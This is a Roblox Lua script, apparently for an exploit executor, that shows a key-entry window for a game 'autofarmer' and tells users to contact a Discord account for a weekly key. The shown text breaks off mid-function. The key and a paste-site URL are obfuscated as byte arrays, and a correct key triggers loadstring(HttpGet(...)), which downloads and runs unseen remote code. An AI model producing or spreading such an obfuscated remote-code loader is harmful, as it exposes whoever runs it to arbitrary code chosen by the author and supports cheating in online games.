local Players = game:GetService("Players") local TweenService = game:GetService("TweenService") local Lighting = game:GetService("Lighting") local player = Players.LocalPlayer local gui = player:WaitForChild("PlayerGui") local function _d(t) local s = "" for i = 1, #t do s ..= string.char(t[i]) end return s end local _KEY = _d({ 67,114,105,109,101 }) local _URL = _d({ 104,116,116,112,115,58,47,47,112,97,115,116,101,102,121,46,97,112,112, 47,48,106,71,48,66,50,50,87,47,114,97,119 }) local blur = Instance.new("BlurEffect") blur.Size = 0 blur.Parent = Lighting TweenService:Create(blur, TweenInfo.new(0.35), {Size = 18}):Play() local ScreenGui = Instance.new("ScreenGui") ScreenGui.Name = "KeySystemGui" ScreenGui.Parent = gui ScreenGui.ResetOnSpawn = false local Main = Instance.new("Frame") Main.Size = UDim2.fromScale(0.62, 0.50) Main.Position = UDim2.fromScale(0.5, 0.5) Main.AnchorPoint = Vector2.new(0.5, 0.5) Main.BackgroundColor3 = Color3.fromRGB(18, 18, 22) Main.Parent = ScreenGui Main.ClipsDescendants = true Instance.new("UICorner", Main).CornerRadius = UDim.new(0, 16) local Stroke = Instance.new("UIStroke") Stroke.Color = Color3.fromRGB(170, 90, 255) Stroke.Thickness = 2 Stroke.Transparency = 0.25 Stroke.Parent = Main TweenService:Create( Stroke, TweenInfo.new(1.6, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut, -1, true), {Transparency = 0.65} ):Play() local Title = Instance.new("TextLabel") Title.Size = UDim2.new(1, -40, 0, 32) Title.Position = UDim2.new(0, 20, 0, 14) Title.BackgroundTransparency = 1 Title.Text = "The Only Autofarmer You’ll Need" Title.Font = Enum.Font.GothamBold Title.TextColor3 = Color3.fromRGB(245, 245, 255) Title.TextScaled = true Title.TextXAlignment = Enum.TextXAlignment.Left Title.Parent = Main local Sub = Instance.new("TextLabel") Sub.Size = UDim2.new(1, -40, 0, 20) Sub.Position = UDim2.new(0, 20, 0, 48) Sub.BackgroundTransparency = 1 Sub.Text = "Enter your key to continue" Sub.Font = Enum.Font.Gotham Sub.TextColor3 = Color3.fromRGB(180, 180, 200) Sub.TextScaled = true Sub.TextXAlignment = Enum.TextXAlignment.Left Sub.Parent = Main local InputFrame = Instance.new("Frame") InputFrame.Size = UDim2.new(0.55, 0, 0, 44) InputFrame.Position = UDim2.new(0, 20, 0, 90) InputFrame.BackgroundColor3 = Color3.fromRGB(35, 35, 45) InputFrame.Parent = Main Instance.new("UICorner", InputFrame).CornerRadius = UDim.new(0, 8) local Input = Instance.new("TextBox") Input.Size = UDim2.new(1, -12, 1, -10) Input.Position = UDim2.fromScale(0.5, 0.5) Input.AnchorPoint = Vector2.new(0.5, 0.5) Input.PlaceholderText = "Enter key" Input.BackgroundTransparency = 1 Input.TextColor3 = Color3.fromRGB(240, 240, 255) Input.Font = Enum.Font.Gotham Input.TextScaled = true Input.ClearTextOnFocus = false Input.Parent = InputFrame local KeyButton = Instance.new("ImageButton") KeyButton.Size = UDim2.new(0, 44, 0, 44) KeyButton.Position = UDim2.new(0, 20 + InputFrame.Size.X.Scale * 0 + 0.55 * Main.AbsoluteSize.X + 10, 0, 90) KeyButton.BackgroundColor3 = Color3.fromRGB(35, 35, 45) KeyButton.Image = "rbxassetid://6031280882" KeyButton.Parent = Main Instance.new("UICorner", KeyButton).CornerRadius = UDim.new(0, 8) local correctSound = Instance.new("Sound") correctSound.SoundId = "rbxassetid://1839997929" correctSound.Volume = 1 correctSound.Parent = Main local wrongSound = Instance.new("Sound") wrongSound.SoundId = "rbxassetid://5521959695" wrongSound.Volume = 1 wrongSound.Parent = Main local InfoFrame = Instance.new("Frame") InfoFrame.Size = UDim2.fromScale(0.55, 0.22) InfoFrame.Position = UDim2.fromScale(0.5, 0.5) InfoFrame.AnchorPoint = Vector2.new(0.5, 0.5) InfoFrame.BackgroundColor3 = Color3.fromRGB(25, 25, 32) InfoFrame.Visible = false InfoFrame.Parent = Main Instance.new("UICorner", InfoFrame).CornerRadius = UDim.new(0, 12) local InfoStroke = Instance.new("UIStroke") InfoStroke.Color = Color3.fromRGB(170, 90, 255) InfoStroke.Transparency = 0.4 InfoStroke.Parent = InfoFrame local InfoText = Instance.new("TextLabel") InfoText.Size = UDim2.new(1, -24, 1, -24) InfoText.Position = UDim2.new(0, 12, 0, 12) InfoText.BackgroundTransparency = 1 InfoText.TextWrapped = true InfoText.TextYAlignment = Enum.TextYAlignment.Center InfoText.Text = "Add blabber.labber on discord to receive your key | this key will reset every week" InfoText.Font = Enum.Font.Gotham InfoText.TextColor3 = Color3.fromRGB(235, 235, 255) InfoText.TextScaled = true InfoText.Parent = InfoFrame KeyButton.MouseButton1Click:Connect(function() InfoFrame.Visible = not InfoFrame.Visible if InfoFrame.Visible then InfoFrame.Size = UDim2.fromScale(0.4, 0.12) TweenService:Create(InfoFrame, TweenInfo.new(0.25), {Size = UDim2.fromScale(0.55, 0.22)}):Play() end end) local function _load() ScreenGui.Enabled = false TweenService:Create(blur, TweenInfo.new(0.3), {Size = 0}):Play() task.spawn(function() loadstring(game:HttpGet(_URL))() end) end Input.FocusLost:Connect(function(enter) if not enter then return end if Input.Text == _KEY then correctSound:Play() _load() else